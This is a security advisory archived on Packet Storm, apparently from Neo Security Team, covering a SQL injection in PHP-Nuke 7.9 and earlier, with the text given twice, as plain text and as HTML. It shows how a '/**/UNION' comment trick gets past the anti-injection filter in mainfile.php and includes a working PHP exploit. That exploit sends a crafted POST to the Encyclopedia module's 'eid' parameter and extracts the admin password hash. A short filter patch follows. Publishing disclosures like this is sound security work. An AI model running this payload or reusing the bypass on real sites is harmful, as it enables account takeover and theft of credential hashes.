exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

PHPNuke-7.9.txt

PHPNuke-7.9.txt
Posted Oct 24, 2006
Authored by Paisterist | Site neosecurityteam.net

[N]eo [S]ecurity [T]eam [NST] - Advisory 27 - 2006-10-22: PHP Nuke versions 7.9 and prior SQL injection advisory and POC exploit.

tags | exploit, php, sql injection
SHA-256 | a631273d526ba8d6c2ae44d86a8c12f330573ca9b1138f7cb7d8703b4a0c47a2

PHPNuke-7.9.txt

Change Mirror Download
------=_Part_215822_13092688.1161562994664
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
Content-Disposition: inline

/*
--------------------------------------------------------
[N]eo [S]ecurity [T]eam [NST] - Advisory 27 - 2006-10-22
--------------------------------------------------------
Program: PHP Nuke
Homepage: http://www.php.net
Vulnerable Versions: PHP Nuke <= 7.9
Risk: High!
Impact: Critical Risk

-==PHP Nuke <= 7.9 SQL Injection and Bypass SQL Injection Protection
vulnerabilities==-
---------------------------------------------------------

- Description
---------------------------------------------------------
PHP-Nuke is a news automated system specially designed to be used in
Intranets and Internet. The Administrator has total control of his web site,
registered users, and he will have in the hand a powerful assembly of tools
to maintain an active and 100% interactive web site using databases.

- Tested
---------------------------------------------------------
localhost & many sites

- Vulnerability Description
---------------------------------------------------------

The most important and critical vulnerability is in the code designed to
filter the POST inputs to protect the script against
SQL Injections.


==[ mainfile.php 143-146 ]==========================
[...]
if (stripos_clone($postString,'%20union%20') OR
stripos_clone($postString,'*/union/*') OR stripos_clone($postString,' union
') OR stripos_clone($postString_64,'%20union%20') OR
stripos_clone($postString_64,'*/union/*') OR stripos_clone($postString_64,'
union ') OR stripos_clone($postString_64,'+union+')) {
header("Location: index.php");
die();
}
[...]
==[ end mainfile.php ]==============================

The protection is very good... but we can bypass it by using something like
'/**/UNION ' or ' UNION/**/' ;)

Also i found a SQL Injection vulnerability in the Encyclopedia module. The
"eid" variable isn't filtered at any moment, so if
we bypass the sql injection protection we can execute arbitrary sql
commands. With a simple UNION statement we get the
md5 hash of the admin password.

Here is the real life Proof of Concept exploit.

==Real Proof of Concept exploit==
<?
/*

Neo Security Team - Exploit made by Paisterist on 2006-10-22
http://www.neosecurityteam.net

*/

$host="localhost";
$path="/phpnuke/";
$prefix="nuke_";
$port="80";
$fp = fsockopen($host, $port, $errno, $errstr, 30);
$data="query=fooaa&eid=foo'/**/UNION SELECT pwd as title FROM
$prefix_authors WHERE '1'='1";

if ($fp) {
$p="POST /phpnuke/modules.php?name=Encyclopedia&file=search
HTTP/1.0\r\n";
$p.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword,
application/x-shockwave-flash, */*\r\n";
$p.="Referer:
http://localhost/phpnuke/modules.php?name=Encyclopedia&file=search\r\n";
$p.="Accept-Language: es-ar\r\n";
$p.="Content-Type: application/x-www-form-urlencoded\r\n";
$p.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1
)\r\n";
$p.="Host: localhost\r\n";
$p.="Content-Length: ".strlen($data)."\r\n";
$p.="Pragma: no-cache\r\n";
$p.="Connection: keep-alive\r\n\r\n";
$p.=$data;

fwrite($fp, $p);

while (!feof($fp)) {
$content .= fread($fp, 4096);
}

preg_match("/([a-zA-Z0-9]{32})/", $content, $matches);

print_r($matches);
}
?>
==Real Proof of Concept exploit==

Whit this PoC code i get the md5 hash of the first admin (God) of the
nuke_authors table.

- How to fix it? More information?
--------------------------------------------------------

You can found a patch on http://www.neosecurityteam.net/foro/

Also, you can modify the line 143 of mainfile.php, adding one more
protection like:

==[ mainfile.php old line (143) ]==========================
[...]
if (stripos_clone($postString,'%20union%20') OR
stripos_clone($postString,'*/union/*') OR stripos_clone($postString,' union
') OR stripos_clone($postString_64,'%20union%20') OR
stripos_clone($postString_64,'*/union/*') OR stripos_clone($postString_64,'
union ') OR stripos_clone($postString_64,'+union+')) {
}
[...]
==[ end mainfile.php ]=====================================

==[ mainfile.php new line (143) ]==========================
[...]
if (stripos_clone($postString,'%20union%20') OR
stripos_clone($postString,'*/union/*') OR stripos_clone($postString,' union
') OR stripos_clone($postString_64,'%20union%20') OR
stripos_clone($postString_64,'*/union/*') OR stripos_clone($postString_64,'
union ') OR stripos_clone($postString_64,'+union+') OR
stripos_clone($postString_64,
'*/UNION ') OR stripos_clone($postString_64, ' UNION/*')) {
}
[...]
==[ end mainfile.php ]=====================================

That's a momentary solution to the problem. I recommend to download the PHP
Nuke 8.0 version in the next days... it is not
free at the moment.

- References
--------------------------------------------------------
http://www.neosecurityteam.net/index.php?action=advisories&id=27

- Credits
--------------------------------------------------------
Anti SQL Injection protection bypass by Paisterist -> paisterist.nst [at]
gmail [dot] com
SQL Injection vulnerability in Encyclopedia module discovered by Paisterist
-> paisterist.nst [at] gmail [dot] com
Proof of Concept exploit by Paisterist -> paisterist.nst [at] gmail [dot]
com

[N]eo [S]ecurity [T]eam [NST] - http://www.neosecurityteam.net/


- Greets
--------------------------------------------------------
HaCkZaTaN
K4P0
Daemon21
Link
0m3gA_x
LINUX
nitrous
m0rpheus
nikyt0x
KingMetal
Knightmare

Argentina, Colombia, Chile, Bolivia, Uruguay EXISTS!!

@@@@'''@@@@'@@@@@@@@@'@@@@@@@@@@@
'@@@@@''@@'@@@''''''''@@''@@@''@@
'@@'@@@@@@''@@@@@@ @@@'''''@@@
'@@'''@@@@'''''''''@@@''''@@@
@@@@''''@@'@@@@@@@@@@''''@@@@@

/* EOF */


--
Paisterist

Neo Security Team http://neosecurityteam.net

------=_Part_215822_13092688.1161562994664
Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
Content-Disposition: inline

/*<br>--------------------------------------------------------<br>[N]eo [S]ecurity [T]eam [NST] - Advisory 27 - 2006-10-22<br>--------------------------------------------------------<br>Program: PHP Nuke<br>Homepage: <a href="http://www.php.net">
http://www.php.net</a><br>Vulnerable Versions: PHP Nuke <= 7.9<br>Risk: High!<br>Impact: Critical Risk<br><br>-==PHP Nuke <= 7.9 SQL Injection and Bypass SQL Injection Protection vulnerabilities==-<br>---------------------------------------------------------
<br><br>- Description<br>---------------------------------------------------------<br>PHP-Nuke is a news automated system specially designed to be used in Intranets and Internet. The Administrator has total control of his web site, registered users, and he will have in the hand a powerful assembly of tools to maintain an active and 100% interactive web site using databases.
<br><br>- Tested<br>---------------------------------------------------------<br>localhost & many sites<br><br>- Vulnerability Description<br>---------------------------------------------------------<br><br>The most important and critical vulnerability is in the code designed to filter the POST inputs to protect the script against
<br>&nbsp;SQL Injections.<br><br><br>==[ mainfile.php 143-146 ]==========================<br>[...]<br>if (stripos_clone($postString,'%20union%20') OR stripos_clone($postString,'*/union/*') OR stripos_clone($postString,' union ') OR stripos_clone($postString_64,'%20union%20') OR stripos_clone($postString_64,'*/union/*') OR stripos_clone($postString_64,' union ') OR stripos_clone($postString_64,'+union+')) {
<br>header("Location: index.php");<br>die();<br>}<br>[...]<br>==[ end mainfile.php ]==============================<br><br>The protection is very good... but we can bypass it by using something like '/**/UNION ' or ' UNION/**/' ;)
<br><br>Also i found a SQL Injection vulnerability in the Encyclopedia module. The "eid" variable isn't filtered at any moment, so if<br>&nbsp;we bypass the sql injection protection we can execute arbitrary sql commands. With a simple UNION statement we get the
<br>md5 hash of the admin password.<br><br>Here is the real life Proof of Concept exploit.<br><br>==Real Proof of Concept exploit==<br><?<br>/*<br><br>Neo Security Team - Exploit made by Paisterist on 2006-10-22<br><a href="http://www.neosecurityteam.net">
http://www.neosecurityteam.net</a><br><br>*/<br><br>$host="localhost";<br>$path="/phpnuke/";<br>$prefix="nuke_";<br>$port="80";<br>$fp = fsockopen($host, $port, $errno, $errstr, 30);
<br>$data="query=fooaa&eid=foo'/**/UNION SELECT pwd as title FROM $prefix_authors WHERE '1'='1";<br><br>if ($fp) {<br>&nbsp;&nbsp;&nbsp; $p="POST /phpnuke/modules.php?name=Encyclopedia&file=search HTTP/1.0\r\n";
<br>&nbsp;&nbsp;&nbsp; $p.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash, */*\r\n";<br>&nbsp;&nbsp;&nbsp; $p.="Referer:
<a href="http://localhost/phpnuke/modules.php?name=Encyclopedia&file=search\r\n">http://localhost/phpnuke/modules.php?name=Encyclopedia&file=search\r\n</a>";<br>&nbsp;&nbsp;&nbsp; $p.="Accept-Language: es-ar\r\n";
<br>&nbsp;&nbsp;&nbsp; $p.="Content-Type: application/x-www-form-urlencoded\r\n";<br>&nbsp;&nbsp;&nbsp; $p.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n";<br>&nbsp;&nbsp;&nbsp; $p.="Host: localhost\r\n";<br>&nbsp;&nbsp;&nbsp; $p.="Content-Length: ".strlen($data)."\r\n";
<br>&nbsp;&nbsp;&nbsp; $p.="Pragma: no-cache\r\n";<br>&nbsp;&nbsp;&nbsp; $p.="Connection: keep-alive\r\n\r\n";<br>&nbsp;&nbsp;&nbsp; $p.=$data;<br>&nbsp;&nbsp;&nbsp; <br>&nbsp;&nbsp;&nbsp; fwrite($fp, $p);<br>&nbsp;&nbsp;&nbsp; <br>&nbsp;&nbsp;&nbsp; while (!feof($fp)) {<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $content .= fread($fp, 4096);
<br>&nbsp;&nbsp;&nbsp; }<br><br>&nbsp;&nbsp;&nbsp; preg_match("/([a-zA-Z0-9]{32})/", $content, $matches);<br><br>&nbsp;&nbsp;&nbsp; print_r($matches);<br>}<br>?><br>==Real Proof of Concept exploit==<br><br>Whit this PoC code i get the md5 hash of the first admin (God) of the nuke_authors table.
<br><br>- How to fix it? More information?<br>--------------------------------------------------------<br><br>You can found a patch on <a href="http://www.neosecurityteam.net/foro/">http://www.neosecurityteam.net/foro/</a>
<br><br>Also, you can modify the line 143 of mainfile.php, adding one more protection like:<br><br>==[ mainfile.php old line (143) ]==========================<br>[...]<br>if (stripos_clone($postString,'%20union%20') OR stripos_clone($postString,'*/union/*') OR stripos_clone($postString,' union ') OR stripos_clone($postString_64,'%20union%20') OR stripos_clone($postString_64,'*/union/*') OR stripos_clone($postString_64,' union ') OR stripos_clone($postString_64,'+union+')) {
<br>}<br>[...]<br>==[ end mainfile.php ]=====================================<br><br>==[ mainfile.php new line (143) ]==========================<br>[...]<br>if (stripos_clone($postString,'%20union%20') OR stripos_clone($postString,'*/union/*') OR stripos_clone($postString,' union ') OR stripos_clone($postString_64,'%20union%20') OR stripos_clone($postString_64,'*/union/*') OR stripos_clone($postString_64,' union ') OR stripos_clone($postString_64,'+union+') OR stripos_clone($postString_64,
<br>'*/UNION ') OR stripos_clone($postString_64, ' UNION/*')) {<br>}<br>[...]<br>==[ end mainfile.php ]=====================================<br><br>That's a momentary solution to the problem. I recommend to download the PHP Nuke
8.0 version in the next days... it is not <br>free at the moment.<br><br>- References<br>--------------------------------------------------------<br><a href="http://www.neosecurityteam.net/index.php?action=advisories&id=27">
http://www.neosecurityteam.net/index.php?action=advisories&id=27</a><br><br>- Credits<br>--------------------------------------------------------<br>Anti SQL Injection protection bypass by Paisterist -> paisterist.nst
[at] gmail [dot] com<br>SQL Injection vulnerability in Encyclopedia module discovered by Paisterist -> paisterist.nst [at] gmail [dot] com<br>Proof of Concept exploit by Paisterist -> paisterist.nst [at] gmail [dot] com
<br><br>[N]eo [S]ecurity [T]eam [NST] - <a href="http://www.neosecurityteam.net/">http://www.neosecurityteam.net/</a><br><br><br>- Greets<br>--------------------------------------------------------<br>HaCkZaTaN<br>K4P0<br>
Daemon21<br>Link<br>0m3gA_x<br>LINUX<br>nitrous<br>m0rpheus<br>nikyt0x<br>KingMetal<br>Knightmare<br><br>Argentina, Colombia, Chile, Bolivia, Uruguay EXISTS!!<br><br>@@@@'''@@@@'@@@@@@@@@'@@@@@@@@@@@<br>'@@@@@''@@'@@@''''''''@@''@@@''@@
<br>'@@'@@@@@@''@@@@@@ @@@'''''@@@<br>'@@'''@@@@'''''''''@@@''''@@@<br>@@@@''''@@'@@@@@@@@@@''''@@@@@<br><br>/* EOF */<br><br clear="all"><br>-- <br>Paisterist<br><br>Neo Security Team <a href="http://neosecurityteam.net">
http://neosecurityteam.net</a>

------=_Part_215822_13092688.1161562994664--
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close